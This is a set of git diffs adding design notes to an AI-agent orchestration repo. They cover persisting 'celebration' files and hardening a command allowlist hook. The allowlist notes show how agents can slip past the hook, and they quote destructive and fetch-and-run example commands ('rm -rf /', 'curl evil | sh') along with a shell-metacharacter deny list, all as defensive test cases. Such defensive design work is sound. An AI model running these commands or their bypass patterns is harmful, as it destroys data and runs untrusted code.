 - External publishing of celebrations.

--- a/ideas/2026-04-17-persisted-celebrations-and-brief-in-cheers.md
+++ b/ideas/2026-04-17-persisted-celebrations-and-brief-in-cheers.md
@@ -152,12 +152,23 @@ Alternative order: celebration fires FIRST, journal is written SECOND with the c
 
 4. **Dashboard — link only.** A `Celebration:` line per quest that links to the file. No inline excerpts, no full rendering. The dashboard is a navigation surface, not a reader.
 
-5. **Filename — `<slug>_<date>.md` (matches journal).** When re-running `/celebrate` on a quest that already has a celebration file:
-   - Render the new celebration and show it to the user.
-   - Prompt: "Replace existing celebration at `<path>`? (y/n)"
-   - On yes, overwrite.
-   - On no, abort without saving.
-   - No `__v2` suffix files; overwrite is the right behavior for a regenerable artifact (git preserves history).
+5. **Filename and overwrite — context-aware, additive by default.** The filename is `<slug>_<date>.md` (matches journal). But "just overwrite" is wrong once you consider *who* is regenerating:
+
+   - **Original write at Step 7** (context-rich): the orchestrator that just completed the quest has full in-session context (handoffs, commit diffs, what happened in chat). The celebration it produces is authoritative.
+   - **Cold regen from archive** (context-thin): a fresh Claude/Codex instance running `/celebrate <archived-id>` later only has the archive files. Its celebration is reconstructed, not relived. Silently replacing a Step-7 original with a cold-regen would erode quality.
+   - **Post-review regen** (context-enriched): after a long PR review cycle with multiple fix iterations, merged state, or follow-up commits, a revised celebration is legitimate — there's new material the original did not know about.
+
+   **Rule:**
+   - Frontmatter carries an `origin:` marker: `step7-original` | `cold-regen` | `post-pr-revision`.
+   - `/celebrate` on a quest that has no file yet: write as `step7-original` (or `cold-regen` if invoked on an archived quest without a prior Step-7 write).
+   - `/celebrate` on a quest that has a `step7-original` file:
+     - Detect meaningful context change since the original (new commits on branch, PR comments, merged/closed state). Cheap checks only — `git log`, `gh pr view`.
+     - **No new context** → warn "original celebration is authoritative and nothing meaningful has changed since; the current regeneration has less context than the original. Overwrite anyway? (y/N)" with default **no**.
+     - **New context exists** → offer a revision mode: append `## Revision: <date>` section to the existing file *or* write a sibling `<slug>_<date>__revision-<YYYYMMDD>.md`. Pick per invocation. Mark the revision's `origin:` as `post-pr-revision` and add a `revision-of:` frontmatter pointer.
+   - `/celebrate` on a quest that has a `cold-regen` file: normal overwrite prompt (cold can replace cold).
+   - In all cases, *render the proposed celebration before any write* so the user can see what they'd be replacing.
+
+   This preserves git history for free (commits still snapshot each revision) while making "don't clobber the context-rich original with a thin one" the default.
 
 ## Backfill Candidates (as of 2026-04-18)
 
@@ -229,10 +240,23 @@ DELIVERABLES
 
 2. Persist the rendered celebration to
    docs/quest-journal/celebrations/<slug>_<date>.md with frontmatter
-   (quest-id, pr, style=celebration, quality-tier, date, journal pointer).
-   When the file already exists: render the new celebration, show it to the
-   user, and prompt 'Replace existing celebration at <path>? (y/n)'. No
-   __v2 suffix files.
+   (quest-id, pr, style=celebration, quality-tier, date, journal pointer,
+   origin={step7-original|cold-regen|post-pr-revision}, and
+   revision-of=<path> when applicable). Always render the celebration
+   before any write so the user can see what would be saved.
+
+   Overwrite policy (context-aware, additive by default):
+   - If no prior file exists: write fresh; origin=step7-original when
+     invoked at Step 7, else cold-regen.
+   - If prior file has origin=step7-original and no meaningful context
+     change (no new commits on branch, no new PR activity): default to
+     NOT overwriting; warn that the current run has less context.
+     Require explicit 'overwrite anyway' confirmation.
+   - If prior file has origin=step7-original AND new context exists:
+     offer revision mode — append '## Revision: <date>' section OR
+     write sibling <slug>_<date>__revision-<YYYYMMDD>.md, user chooses.
+     Mark origin=post-pr-revision and set revision-of.
+   - If prior file has origin=cold-regen: normal overwrite prompt.
 
 3. Update .skills/quest/delegation/workflow.md Step 7 to:
    (a) run the celebration BEFORE writing the journal (celebration-first order)
@@ -254,11 +278,20 @@ DELIVERABLES
    as a link per quest by reading the journal's Celebration line.
    **Link only, no inline embedding.**
 
-7. Focused tests under tests/ for: brief extraction edge cases (no heading,
-   one-line prompt, Problem+Impact pair), celebration persistence (overwrite
-   prompt, frontmatter shape), journal<->celebration link pairing, allowlist
-   flag behavior (auto-run vs prompt vs solo override), overwrite-prompt
-   accept/decline flows.
+7. Focused tests under tests/ for:
+   - brief extraction edge cases (no heading, one-line prompt,
+     Problem+Impact pair)
+   - frontmatter shape (all fields including origin and revision-of)
+   - journal <-> celebration link pairing
+   - allowlist flag behavior (auto-run vs prompt vs solo override)
+   - overwrite policy matrix:
+     - no prior file at Step 7 -> writes origin=step7-original
+     - no prior file via /celebrate <archived-id> -> writes origin=cold-regen
+     - prior step7-original + no new context -> default declines overwrite
+     - prior step7-original + new commits/PR activity -> offers revision mode
+     - prior cold-regen -> normal overwrite prompt
+   - context-change detection (new commits on branch, new PR comments,
+     merged/closed state) without requiring a live gh call in tests.
 
 OUT OF SCOPE
 

--- a/ideas/2026-04-17-persisted-celebrations-and-brief-in-cheers.md
+++ b/ideas/2026-04-17-persisted-celebrations-and-brief-in-cheers.md
@@ -1,0 +1,205 @@
+# Idea: Persisted Celebrations With Embedded Brief And Journal Cross-Links
+
+## Status: proposed (follow-up quest)
+
+## Origin
+
+Surfaced during the Review Intelligence Phase 2 quest wrap-up. User's stated preference: celebrations are *"much more enjoyable and let you understand things better"* than the structured journal — they carry cast, achievements, quote, and victory narrative that the journal does not — but today they are ephemeral chat output.
+
+The Quest Dashboard surfaces quest stats and briefs well, but the *celebrations* — generated once at `/celebrate` time and then lost — are actually the most valuable record to preserve and re-read.
+
+We want celebrations to survive the session and be cross-linked with the quest journal, so any reader (dashboard, another quest, a human browsing months later) can jump from "I see this quest happened" to "here is what it felt like and what it shipped."
+
+## Reference Project
+
+`doc2md` (Jean-Claude / Dexter) already solves the persistence half:
+
+- `docs/journal/NNN-celebrate-<slug>.md` — narrative celebration entries with frontmatter (`quest-id`, `pr`, `style`, `quality-tier`, `date`).
+- `docs/dexter-journal/NNN-requiem-<slug>.md` — parallel style with ascii tombstones.
+- `docs/quest-journal/<slug>_<date>.md` — structured quest journal, adjacent to the celebration.
+- Both are checked into git at quest completion time.
+
+We will borrow the **pattern** (persist + cross-link + frontmatter), not the double-persona voice. Our single-voice celebrations already exist — we just need to save them.
+
+## Problem
+
+1. **Celebrations are ephemeral.** The `celebrate` skill prints rich markdown to the chat and disappears. The data the skill read (handoffs, fixer summary, arbiter verdict) is archived, but the synthesized *narrative* is not.
+2. **Journals are dry.** `docs/quest-journal/<id>.md` captures stats, file list, and brief, but it does not carry achievements, the quote, or the victory narrative. Re-reading it months later is less enjoyable than re-reading a celebration.
+3. **No problem statement in the celebration.** The celebration currently focuses on *what happened*, not *why we started*. The brief is already available; it should be pulled in so the celebration is self-contained.
+4. **Dashboard has no hook into celebration narratives.** It reads journals and archives but cannot link out to "the good story."
+
+## Proposal
+
+Add three behaviors to the `celebrate` skill and the Step 7 (complete) path of `workflow.md`:
+
+### 1. Embed a short brief in the celebration
+
+Pull from `quest_brief.md`:
+
+- Extract the first paragraph after the "What Started" / "Problem" / brief body heading.
+- If a Problem/Impact pair exists, include both as short paragraphs.
+- If only a one-line prompt exists, quote it as-is.
+- Always link back to the full brief at `.quest/archive/<id>/quest_brief.md`.
+
+Add a new celebration section placed between the title art and the Starring Cast:
+
+```markdown
+## 📖 What Started This
+
+<short problem statement>
+
+<short impact statement, optional>
+
+Reference: <ideas/... or other referenced doc, if mentioned in the brief>
+```
+
+### 2. Persist the celebration to disk
+
+At the end of the `celebrate` skill's render step, also write the full markdown (block art + all sections) to:
+
+```
+docs/quest-journal/celebrations/<slug>_<date>.md
+```
+
+Frontmatter at the top (matches doc2md pattern):
+
+```markdown
+<!-- quest-id: <id> -->
+<!-- pr: <#NN or null> -->
+<!-- style: celebration -->
+<!-- quality-tier: <tier> -->
+<!-- date: <YYYY-MM-DD> -->
+<!-- journal: ../<slug>_<date>.md -->
+```
+
+The celebrations subdirectory should be created if it does not exist. If the file already exists (replay of `/celebrate` on the same quest), overwrite it — re-running the celebration should produce the same (or improved) artifact, not append.
+
+### 3. Link journal ↔ celebration
+
+When the quest journal is written (Step 7), add two new lines to the header block:
+
+```markdown
+- PR: [#NN](<url>)
+- Celebration: [`celebrations/<slug>_<date>.md`](celebrations/<slug>_<date>.md)
+```
+
+The celebration frontmatter already points back to the journal via the `<!-- journal: -->` comment, closing the loop.
+
+## Where It Plugs In
+
+- `.skills/celebrate/SKILL.md` — add Step 5 ("Persist") and Step 6 ("Emit brief section"). The render instructions already exist; the change is about *where the output goes* and *what new section is included*.
+- `.skills/quest/delegation/workflow.md` Step 7 — when the journal entry is being written, add the Celebration link line if a celebration file was produced (or if one is about to be produced — order-of-operations is a design choice, see Open Questions).
+- `scripts/quest_celebrate/` — already owns the animation + ASCII side of things. Could own the persistence helper too, as a new `persist.py` that takes the rendered markdown + quest archive path and writes the celebration file.
+- `scripts/quest_dashboard/` — the dashboard can add a "Celebration" column/link by reading the journal's Celebration line OR by globbing `docs/quest-journal/celebrations/`.
+
+## Data Flow
+
+```
+Quest completes
+    │
+    ▼
+Step 7 Journal Write ──── writes docs/quest-journal/<slug>_<date>.md
+    │                         (with Celebration link placeholder)
+    ▼
+/celebrate skill fires
+    │    reads quest_brief.md for problem statement
+    │    reads handoffs for cast / metrics / quote
+    │    renders markdown (existing behavior)
+    │
+    ▼
+Celebration persist step ──── writes docs/quest-journal/celebrations/<slug>_<date>.md
+    │                              (with frontmatter linking to journal)
+    ▼
+Dashboard next refresh ──── shows "Celebration" link pulled from journal
+```
+
+Alternative order: celebration fires FIRST, journal is written SECOND with the celebration path already known. This is cleaner (no placeholder) but moves celebration from an optional post-complete step to part of the complete path. Worth debating; see Open Questions.
+
+## Acceptance Signals
+
+- Every new quest ends with two sibling markdown files: `docs/quest-journal/<id>.md` and `docs/quest-journal/celebrations/<id>.md`, each linking to the other.
+- The celebration file includes a brief-derived problem/impact section before the starring cast.
+- Dashboard surfaces the celebration link for each completed quest.
+- Re-running `/celebrate <id>` on an archived quest regenerates the celebration file in place (idempotent).
+- Existing celebrations (this one and any future ones before the quest ships) can be retrofitted by a one-time backfill script that walks `.quest/archive/` and generates missing celebration files.
+
+## Scope Boundaries
+
+**In scope:**
+- Celebration persistence to `docs/quest-journal/celebrations/`
+- Brief embedding in celebrations
+- Journal ↔ celebration cross-linking
+- Dashboard surfacing the link (read-only)
+- Backfill script for existing archived quests
+
+**Out of scope:**
+- Dual-persona voices (we are not building a Dexter)
+- Rewriting existing quest journal entries (too risky; only add the Celebration link if a celebration file exists or is being produced)
+- Auto-publishing celebrations anywhere external
+- Changing the tier scale or the ASCII art rules
+
+## Open Questions
+
+1. **Ordering:** does the celebration fire before or after the journal write? The cleaner path is celebration-first (journal references a real file), but celebration is currently user-triggered (`/celebrate`). Options: auto-celebrate at Step 7 (default on) with an opt-out; or leave celebration user-triggered but have the journal write a placeholder that fills in on next celebration.
+2. **Auto-trigger on quest complete:** should Step 7 invoke `/celebrate` automatically? This raises the question of what happens if the user does not want a celebration (e.g., small fix quests). Leaning: yes for `workflow` mode, optional for `solo`, with an allowlist gate.
+3. **Backfill of existing quests:** there are ~10 archived quests without celebrations. A one-time `scripts/quest_backfill_celebrations.py` similar to the existing `quest_backfill_journal.py` could generate them. Worth its own small quest slice.
+4. **Dashboard surfacing:** should the dashboard embed the celebration (heavy) or just link to it (light)? Light link is safer; avoid inflating dashboard payload.
+5. **Filename collisions:** if two quests complete on the same date with the same slug root (rare but possible with solo vs workflow re-runs), include the `__HHMM` part of the quest ID in the celebration filename. Align with whatever the journal naming already does.
+
+## Follow-Up Quest Prompt (Draft)
+
+```text
+/quest "Persist quest celebrations to disk with embedded brief and journal cross-links.
+
+Reference: ideas/2026-04-17-persisted-celebrations-and-brief-in-cheers.md
+Pattern reference (light): ../doc2md/docs/journal/ + docs/quest-journal/ directory structure.
+
+DELIVERABLES
+
+1. Extend .skills/celebrate/SKILL.md so celebrations include a 'What Started This'
+   section pulled from quest_brief.md (problem + impact paragraphs, fallback to
+   full brief quote if structured headings are missing).
+
+2. Persist the rendered celebration to
+   docs/quest-journal/celebrations/<slug>_<date>.md with frontmatter
+   (quest-id, pr, style=celebration, quality-tier, date, journal pointer).
+   Re-runs are idempotent (overwrite, do not append).
+
+3. Update .skills/quest/delegation/workflow.md Step 7 to include a
+   'Celebration: <path>' link in the journal header when a celebration file
+   exists or is about to be produced.
+
+4. New helper scripts/quest_celebrate/persist.py (or equivalent) that takes
+   the rendered markdown plus quest archive path and writes the celebration
+   file with correct frontmatter.
+
+5. Dashboard integration: scripts/quest_dashboard/ surfaces the celebration
+   link per quest by reading the journal's Celebration line. Read-only — do not
+   embed full content.
+
+6. Backfill script scripts/quest_backfill_celebrations.py that walks
+   .quest/archive/ and generates missing celebration files from available
+   handoffs and the brief. Optional companion to quest_backfill_journal.py.
+
+7. Focused tests under tests/ for: brief extraction edge cases (no heading,
+   one-line prompt, Problem+Impact pair), celebration persistence (idempotent
+   overwrite, frontmatter shape), journal↔celebration link pairing,
+   backfill script happy path + skipping cases.
+
+OUT OF SCOPE
+
+- Dual-persona voices (no Dexter-style requiem).
+- Dashboard content embedding (links only).
+- External publishing of celebrations.
+- Tier scale or ASCII art changes.
+
+KILL CRITERIA
+
+Roll back if celebration persistence introduces state churn, if backfill
+produces worse narratives than the original skill, or if the journal
+link breaks existing dashboard rendering."
+```
+
+## Priority
+
+Medium. This is a polish / legibility play, not a correctness play. But the user explicitly noted it "almost got forgotten" and that celebrations are the most enjoyable way to re-read quest history — a high-signal UX feedback worth acting on before the backlog of uncelebrated quests grows.

--- a/ideas/2026-04-20-allowlist-enforcement-activation.md
+++ b/ideas/2026-04-20-allowlist-enforcement-activation.md
@@ -1,0 +1,142 @@
+# Idea: Allowlist Enforcement — Role Identification, Hook Activation, and Bypass Tests
+
+## Status: proposed (follow-up quest)
+
+## Origin
+
+Surfaced during PR #94 review. The user asked whether `enforce-allowlist.sh` was being used (answer: no) and whether that was intentional (answer: likely yes, deferred). This doc lays out the specific blockers that need to land before the `PreToolUse` hook can responsibly be turned on.
+
+Scope here is **activation**: wiring the hook, solving the role-identification gap, and proving the enforcement works. It does **not** cover allowlist content bugs (bare bash/python, prefix matcher) — those are tracked in `ideas/2026-04-20-allowlist-pattern-hygiene.md` and are a strict prerequisite.
+
+## The current state
+
+| Component | Status |
+|---|---|
+| `.claude/hooks/enforce-allowlist.sh` | Exists, written for PreToolUse, reads `$1` as role arg, reads stdin as tool-use JSON. |
+| `.claude/settings.json` `hooks.PreToolUse` | **Not present.** Only `SessionStart` and `PostToolUse` (audit log) are wired. |
+| `.ai/allowlist.json` `role_permissions` | Exists, populated per role. Content has known bugs (see sibling doc). |
+
+## The three blockers
+
+### Blocker 1 — Role identification
+
+`enforce-allowlist.sh:10` starts with `ROLE="${1:-}"` — it expects the role as a positional CLI argument. Claude Code's `PreToolUse` hook interface provides **stdin only** (the tool-use JSON). There's no mechanism for the orchestrator to say *"this tool call is from the fixer"* via hook arguments.
+
+Result today (if the hook were wired): every invocation would have `ROLE=""` → hit `[[ -z "$ROLE" ]] && exit 0` → silently allow everything. No enforcement actually happens.
+
+**Fix candidates:**
+
+- **Environment variable.** Orchestrator sets `QUEST_ROLE=builder_agent` (or similar) in the subprocess environment before triggering any tool call. Hook reads `ROLE="${QUEST_ROLE:-}"` instead of `$1`. Simplest. But: the orchestrator must have a well-defined "current role" and discipline to set it. Every role-change boundary must set/unset the env var. Nested orchestration gets awkward.
+
+- **Sentinel file.** Orchestrator writes `.quest/current_role` with the role name at dispatch time. Hook reads the file. Survives across process boundaries. But: cleanup discipline required, stale files can cause stale enforcement.
+
+- **Claude Code user context.** If the Claude Code API exposes session-scoped user context (a key-value the orchestrator can set and hooks can read), use that. Needs investigation of what `PreToolUse` stdin actually contains — maybe it already carries the subagent label.
+
+**My lean:** investigate Claude Code hook stdin contents first. If the PreToolUse JSON already contains the subagent label (e.g. `subagent_type: "fixer"`), no new mechanism is needed — the hook just reads from the JSON. If it doesn't, environment-variable is the simplest reliable option, with orchestrator discipline encoded in `workflow.md`.
+
+### Blocker 2 — Allowlist content bugs
+
+Tracked in `ideas/2026-04-20-allowlist-pattern-hygiene.md`. Must land first. Otherwise activation would:
+
+- Block legitimate commands (`gh pr view 123` because the entry is `gh pr view.*` literal).
+- Permit compound commands (`git status && rm -rf /` because prefix matcher).
+- Permit bare-bash escape (`bash -c 'anything'` because bare `"bash"` is in the list).
+
+Turning the hook on with these bugs still present would simultaneously over-block and under-block. Strictly worse than no enforcement.
+
+### Blocker 3 — No bypass tests
+
+No test currently asserts that `enforce-allowlist.sh` actually blocks anything. Adding the hook to `settings.json` without tests means a regression in the matcher goes undetected indefinitely.
+
+## Proposal
+
+A small quest that, in order:
+
+1. **Investigate PreToolUse stdin.** Read Claude Code hook docs / examples. Write a trivial diagnostic hook (`log stdin to a file`) and examine what Claude actually passes when a subagent invokes a tool. Confirm whether the subagent/role label is present.
+
+2. **Implement role identification.** Based on the investigation:
+   - If role is in stdin → update `enforce-allowlist.sh` to read it from JSON.
+   - Else → add `QUEST_ROLE` env-var writing to orchestrator dispatch in `.skills/quest/delegation/workflow.md` (every role invocation), and update the hook to read `${QUEST_ROLE}`.
+
+3. **Write bypass tests.** Scripts under `tests/` that invoke the hook with representative tool-use JSONs for each role and each decision (allow / block), asserting exit codes. Cover:
+   - Allowed command for the right role → exit 0.
+   - Allowed command for a DIFFERENT role whose allowlist excludes it → exit 2.
+   - Disallowed metachar-compound command → exit 2.
+   - Missing role → exit 0 (current safety fallback — keep this so a misconfigured hook doesn't wedge the entire tool stack).
+
+4. **Wire the hook in settings.json.** Add `PreToolUse` entry pointing at `enforce-allowlist.sh`.
+
+5. **Dogfood it on a real quest.** Run one small quest with the hook active. Observe behavior. Confirm nothing legitimate is blocked; confirm at least one synthetic bad command is blocked (e.g. manually try `bash -c 'rm -rf /tmp/nonexistent'` from a role that doesn't have bare `bash`).
+
+## Files to change
+
+- `.claude/hooks/enforce-allowlist.sh` — role source (stdin or env var).
+- `.claude/settings.json` — add `PreToolUse` hook wiring.
+- `.skills/quest/delegation/workflow.md` — document the role-identification contract; if env-var-based, add "set `QUEST_ROLE` before each role dispatch" to every Task/Codex invocation section.
+- `tests/` — new hook bypass test suite (`tests/unit/test_enforce_allowlist.sh` or `.py`).
+
+## Acceptance Criteria
+
+1. The PR #2026-04-20-allowlist-pattern-hygiene has landed (prerequisite).
+2. `PreToolUse` hook is wired in `.claude/settings.json`.
+3. Role identification works: hook resolves the current role via a documented mechanism (stdin field or env var) and applies that role's allowlist.
+4. Bypass test suite covers:
+   - Allowed command for correct role → exit 0.
+   - Allowed command for wrong role → exit 2.
+   - Compound command with `&&` → exit 2.
+   - Compound command with `;` → exit 2.
+   - Missing role → exit 0 (safety).
+5. One real quest runs cleanly with the hook active, documented in a journal entry.
+
+## Out of Scope
+
+- Expanding allowlist coverage beyond what roles already need.
+- Building a graphical allowlist editor.
+- Hook performance profiling (acceptable unless someone observes a real slowdown).
+
+## Priority
+
+Medium. Without hook activation, the allowlist is documentation. Fixing allowlist patterns (pattern-hygiene doc) is a prerequisite and is higher priority because it also tightens the documented intent for humans. Activation is the payoff step: it converts the documented intent into enforced behavior.
+
+The sequencing matters: **do not activate before patterns are fixed.** Activating first would produce worse behavior than the current "documented but not enforced" state.
+
+## Dependencies
+
+**Blocked by:** `ideas/2026-04-20-allowlist-pattern-hygiene.md`.
+
+## Follow-up Quest Prompt (Draft)
+
+```text
+/quest "Activate allowlist enforcement: role identification, hook wiring, bypass tests.
+
+Reference: ideas/2026-04-20-allowlist-enforcement-activation.md
+Prerequisite: ideas/2026-04-20-allowlist-pattern-hygiene.md must have landed.
+
+DELIVERABLES
+
+1. Investigate Claude Code PreToolUse stdin contents via a diagnostic hook.
+   Confirm whether subagent/role label is present.
+
+2. Implement role identification:
+   - If role is in stdin -> update enforce-allowlist.sh to read it from JSON.
+   - Else -> add QUEST_ROLE env-var dispatch to .skills/quest/delegation/workflow.md
+     and update the hook to read env var.
+
+3. Write a bypass test suite at tests/unit/test_enforce_allowlist.* covering:
+   - allowed command + correct role = exit 0
+   - allowed command + wrong role = exit 2
+   - compound command with &&, ;, |, etc. = exit 2
+   - missing role = exit 0 (safety)
+
+4. Wire PreToolUse in .claude/settings.json.
+
+5. Dogfood: run one real quest with the hook active, write a journal entry
+   documenting what legitimate commands ran and at least one synthetic
+   bad command that was correctly blocked.
+
+OUT OF SCOPE
+
+- Expanding allowlist coverage beyond what roles need.
+- GUI/editor for the allowlist.
+- Performance profiling unless a real slowdown is observed."
+```

--- a/ideas/2026-04-20-allowlist-pattern-hygiene.md
+++ b/ideas/2026-04-20-allowlist-pattern-hygiene.md
@@ -1,0 +1,167 @@
+# Idea: Allowlist Pattern Hygiene — Remove Bare Bash/Python, Fix Matcher, Reject Shell Metacharacters
+
+## Status: proposed (follow-up quest)
+
+## Origin
+
+Surfaced during PR #94 review (bot findings on `.ai/allowlist.json` + `enforce-allowlist.sh`). User explicitly flagged the allowlist as having security gaps even though the enforcement hook is not wired yet. The allowlist is the source of truth the moment enforcement activates — fixing its content is a prerequisite to turning the hook on.
+
+Scope is tightly **allowlist content + matcher behavior**. This doc does **not** cover role-identification or hook activation — those are tracked in `ideas/2026-04-20-allowlist-enforcement-activation.md`.
+
+## Problems
+
+### 1. Bare program tokens permit arbitrary commands
+
+Current `.ai/allowlist.json` contains entries like `"bash"`, `"python"`, `"python3"` in several roles' `bash` permission list. Combined with the prefix matcher (see below), this means:
+
+- `"bash"` allowed → `bash -c 'rm -rf /'` matches the prefix `bash` → **allowed**.
+- `"python"` allowed → `python -c "import os; os.system('curl evil | sh')"` matches prefix `python` → **allowed**.
+- `"python3"` allowed → same as python.
+
+Bare tokens defeat the purpose of having an allowlist at all. The matcher can't distinguish intent once the program name matches.
+
+### 2. Prefix matcher lets compound commands through
+
+`.claude/hooks/enforce-allowlist.sh`'s `check_bash` does:
+
+```bash
+if [[ "$command" == "$allowed"* ]]; then
+  return 0
+fi
+```
+
+So `allowed="git status"` matches the command `git status && rm -rf /` because the command literally starts with `git status`. Shell metacharacters (`&&`, `||`, `;`, `|`, backticks, `$()`, `>(`, `<(`) are transparent to the matcher.
+
+### 3. `gh pr view.*` is treated as a literal prefix
+
+Multiple role entries contain `"gh pr view.*"`. The matcher treats this as a literal prefix. Result:
+
+- Actual `gh pr view 123` does **not** match (the prefix expects a literal `.` then `*`).
+- The intended permission is silently blocked.
+
+Whoever authored this thought the matcher supported regex or extglob. It doesn't.
+
+## Proposal
+
+### 1. Replace bare tokens with explicit program+args
+
+For every role's `bash` list, remove bare `"bash"`, `"python"`, `"python3"`. Replace with specific invocations the role actually needs. Examples (illustrative, not authoritative):
+
+| Role | Replace bare entry with |
+|---|---|
+| `builder_agent` | `"python3 -m pytest"`, `"python3 -m unittest"`, `"bash scripts/quest_validate-manifest.sh"`, `"bash scripts/quest_validate-quest-config.sh"`, `"bash scripts/quest_validate-quest-state.sh"`, `"bash tests/test-quest-preflight.sh"`, `"bash tests/test-quest-runtime.sh"`, `"bash tests/test-validate-handoff-contracts.sh"`, `"bash tests/test-validate-quest-state.sh"` |
+| `fixer_agent` | Same set as builder_agent. |
+| `plan_review_a`, `plan_review_b`, `code_review_agent` | `"python3 -m pytest"`. Remove `"python"`, `"python3"`. |
+
+Rationale: every real invocation during a quest is one of a small set of canonical commands. Enumerate them explicitly. "We will add new ones when we need them" is cheap; "we will never allow arbitrary bash" is the guarantee.
+
+### 2. Replace prefix matcher with token-aware matcher
+
+Change `check_bash` from prefix match to a token-aware match with metacharacter rejection. Two layers:
+
+**Layer 1 — Reject compound commands.** Before any allowlist check, reject the command if it contains any of:
+- `&&`, `||`, `;`, `|` (pipes/sequences)
+- Backticks (`` ` ``), `$()` (command substitution)
+- `>(`, `<(` (process substitution)
+- Redirection to shell: `>`, `>>` targeting files outside a whitelist (harder to gate cleanly; start by blocking arbitrary `>` to non-path values)
+
+Exception: an explicit allowlist entry may contain these operators IF it is an exact-match entry (see Layer 2). That preserves the ability to allow `bash -lc 'pytest && ruff'` as a single compound entry when explicitly needed.
+
+**Layer 2 — Tokenized first-N-tokens match.** For the remaining simple-command case:
+- Split the candidate command on whitespace into tokens.
+- For each allowlist entry, split it on whitespace.
+- Match if the candidate's first-K tokens equal the entry's K tokens (where K = the entry's token count).
+
+So `"gh pr view"` (3 tokens) matches `gh pr view 123` (first 3 tokens = `gh pr view`). `"python3 -m pytest"` matches `python3 -m pytest tests/unit/` but NOT `python3 -m other`.
+
+Edge cases:
+- Quoted arguments: `python3 -c "a b c"` tokenizes naively to `["python3", "-c", "\"a", "b", "c\""]`. For the matcher, using `shlex.split` is safer than naive `split()` but introduces shell-parsing complexity. Start with naive `split` + the metacharacter rejection from Layer 1, which together cover the common cases without needing shell parsing.
+
+**No regex.** Regex in a permission matcher is a foot-cannon. Exact and tokenized-prefix are plenty.
+
+### 3. Fix the three existing `gh pr view.*` entries
+
+Replace `"gh pr view.*"` → `"gh pr view"` (token-count 3, matches `gh pr view <args>`).
+
+## Files to change
+
+- `.ai/allowlist.json` — every role's `bash` list (6 roles: `planner_agent`, `plan_review_a`, `plan_review_b`, `arbiter_agent`, `builder_agent`, `code_review_agent`, `fixer_agent`).
+- `.claude/hooks/enforce-allowlist.sh` — replace `check_bash` prefix match with metacharacter rejection + tokenized first-N match.
+- Possibly migrate `check_bash` into a Python helper under `scripts/` so unit tests are easier to write (bash testing is possible but tedious; Python is what the rest of the stack uses).
+
+## Tests
+
+A new `tests/unit/test_allowlist_matcher.py` (or the equivalent shell-test file) covering at minimum:
+
+- `"bash"` bare — rejected for all commands when not in allowlist.
+- `"bash scripts/quest_validate-manifest.sh"` — allows exact command; blocks `bash scripts/quest_validate-manifest.sh && rm -rf /` (metachar reject); blocks `bash scripts/other.sh` (tokens mismatch).
+- `"git status"` (2 tokens) — allows `git status`, `git status --short`; blocks `git status && rm -rf /` (metachar); blocks `git statuss` (token mismatch).
+- `"python3 -m pytest"` — allows `python3 -m pytest tests/unit/` (first 3 tokens match); blocks `python3 -m other`.
+- `"gh pr view"` — allows `gh pr view 123`, `gh pr view 94 --json`; blocks `gh pr viewall` (token `viewall` != `view`).
+- Shell metacharacter matrix: each of `&&`, `||`, `;`, `|`, `` ` ``, `$()`, `>(`, `<(` causes rejection even when the first tokens match.
+
+## Acceptance Criteria
+
+1. No role's `bash` list contains bare `"bash"`, `"python"`, or `"python3"`.
+2. Every `"gh pr view.*"` entry is replaced with `"gh pr view"`.
+3. The matcher rejects any command containing `&&`, `||`, `;`, `|`, backticks, `$()`, `>(`, `<(` unless the command matches an explicit entry byte-for-byte.
+4. The matcher uses tokenized first-N matching, not prefix matching.
+5. Unit tests cover the matrix of bypass scenarios and legitimate invocations per the test list above.
+6. `bash scripts/quest_validate-manifest.sh` still works end-to-end; `python3 -m pytest` still works end-to-end.
+
+## Out of Scope
+
+- Role-identification mechanism (hook needs to know which role is invoking).
+- PreToolUse hook activation in `.claude/settings.json`.
+- File-write pattern matching (already uses globs, no comparable bug).
+- Additional command coverage (only fixing what's broken, not widening allowlist intent).
+
+## Dependencies
+
+None directly. But **blocks** `ideas/2026-04-20-allowlist-enforcement-activation.md` — turning on the hook without fixing patterns first would block legitimate work AND fail to block real bad commands.
+
+## Priority
+
+High. The allowlist is already shipping content; the content has security holes; any future activation of the hook inherits those holes.
+
+## Follow-up Quest Prompt (Draft)
+
+```text
+/quest "Harden .ai/allowlist.json patterns and enforce-allowlist.sh matcher.
+
+Reference: ideas/2026-04-20-allowlist-pattern-hygiene.md
+
+DELIVERABLES
+
+1. Remove bare 'bash', 'python', 'python3' from every role's bash list in
+   .ai/allowlist.json. Replace with explicit program+args invocations
+   enumerated in the idea doc.
+
+2. Replace every 'gh pr view.*' entry with 'gh pr view' so tokenized
+   matching handles the intended wildcard.
+
+3. Rewrite .claude/hooks/enforce-allowlist.sh check_bash (or migrate to a
+   Python helper) to:
+   - reject compound commands containing &&, ||, ;, |, backticks, $(), >(, <(
+     unless the command matches an allowlist entry byte-for-byte;
+   - otherwise tokenized first-N match (first K tokens of candidate ==
+     K tokens of entry).
+
+4. Add tests/unit/test_allowlist_matcher.py covering:
+   - bare-token rejection
+   - exact-command allow
+   - metacharacter rejection matrix
+   - tokenized-prefix behavior (including the gh pr view case)
+   - legitimate invocations still work
+
+5. Manual validation: run the existing quest pipeline with the updated
+   allowlist active (via the helper, even if the hook is not yet wired)
+   and confirm builder/fixer/reviewer pytest + manifest validation still
+   pass.
+
+OUT OF SCOPE
+
+- Role-identification mechanism.
+- PreToolUse hook activation.
+- Widening allowlist intent beyond what roles already need."
+```

--- a/ideas/2026-04-20-allowlist-pattern-hygiene.md
+++ b/ideas/2026-04-20-allowlist-pattern-hygiene.md
@@ -85,7 +85,7 @@ Replace `"gh pr view.*"` → `"gh pr view"` (token-count 3, matches `gh pr view 
 
 ## Files to change
 
-- `.ai/allowlist.json` — every role's `bash` list (6 roles: `planner_agent`, `plan_review_a`, `plan_review_b`, `arbiter_agent`, `builder_agent`, `code_review_agent`, `fixer_agent`).
+- `.ai/allowlist.json` — every role's `bash` list (7 roles: `planner_agent`, `plan_review_a`, `plan_review_b`, `arbiter_agent`, `builder_agent`, `code_review_agent`, `fixer_agent`).
 - `.claude/hooks/enforce-allowlist.sh` — replace `check_bash` prefix match with metacharacter rejection + tokenized first-N match.
 - Possibly migrate `check_bash` into a Python helper under `scripts/` so unit tests are easier to write (bash testing is possible but tedious; Python is what the rest of the stack uses).
 

--- a/ideas/2026-04-20-runner-cwd-path-hygiene.md
+++ b/ideas/2026-04-20-runner-cwd-path-hygiene.md
@@ -1,0 +1,132 @@
+# Idea: Runner `cwd`-Relative Path Hygiene Sweep
+
+## Status: proposed (follow-up quest)
+
+## Origin
+
